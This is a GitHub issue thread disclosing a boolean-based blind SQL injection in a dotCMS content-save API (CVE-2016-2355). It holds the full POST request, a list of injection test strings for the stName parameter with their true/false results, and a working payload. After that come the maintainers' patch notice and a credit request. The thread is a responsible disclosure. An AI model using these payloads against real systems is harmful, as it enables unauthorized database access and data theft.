SQL Injection Vulnerability(CVE-2016-2355) #8848

Closed
droidsec-cn opened this Issue Apr 8, 2016 · 4 comments

Projects

None yet

2 participants

@droidsec-cn

Attack details
url: http://localhost:8080/api/content/save/1
postdata:address1=e&address2=e&city=e&contactMe=false&email=sample%40email.tst&firstName=e&fund=Growth&ipAddress=127.0.0.1&lastName=e&state=e&stName=RequestProspectus
URL encoded POST input stName was set to -1' OR 3_2_1=6 AND 00053=00053 or 'cFbN0pEu'='

Tests performed:
-1' OR 2+53-53-1=0+0+0+1 or 'cFbN0pEu'=' => TRUE
-1' OR 3+53-53-1=0+0+0+1 or 'cFbN0pEu'=' => FALSE
-1' OR 3_2<(0+5+53-53) or 'cFbN0pEu'=' => FALSE
-1' OR 3_2>(0+5+53-53) or 'cFbN0pEu'=' => FALSE
-1' OR 2+1-1-1=1 AND 00053=00053 or 'cFbN0pEu'=' => TRUE
-1' OR 00053=00053 AND 3+1-1-1=1 or 'cFbN0pEu'=' => FALSE
-1' OR 3_2=5 AND 00053=00053 or 'cFbN0pEu'=' => FALSE
-1' OR 3_2=6 AND 00053=00053 or 'cFbN0pEu'=' => TRUE
-1' OR 3_2_0=6 AND 00053=00053 or 'cFbN0pEu'=' => FALSE
-1' OR 3_2_1=6 AND 00053=00053 or 'cFbN0pEu'=' => TRUE

Original value: RequestProspectus

Parameter: stName (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: address1=e&address2=e&city=e&contactMe=false&email=sample@email.tst&firstName=e&fund=Growth&ipAddress=127.0.0.1&lastName=e&state=e&stName=RequestProspectus' AND 6745=6745 AND 'ajDn'='ajDn

@droidsec-cn

may I ask this vulnerability currently has new progress it?

@wezell
Contributor
wezell commented Apr 12, 2016

This issue in the process of being patched for release.

@brentgriffin brentgriffin pushed a commit that closed this issue Apr 12, 2016
@wezell wezell fixes #8848 897f363
@droidsec-cn

CERT has assigned CVE-2016-2355 to this issue

@droidsec-cn droidsec-cn changed the title from SQL Injection Vulnerability to SQL Injection Vulnerability(CVE-2016-2355) Apr 13, 2016
@droidsec-cn

Hello,can you update the Credit in http://dotcms.com/security/SI-35
with the team name: Nicky of Tencent Security Platform Department

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment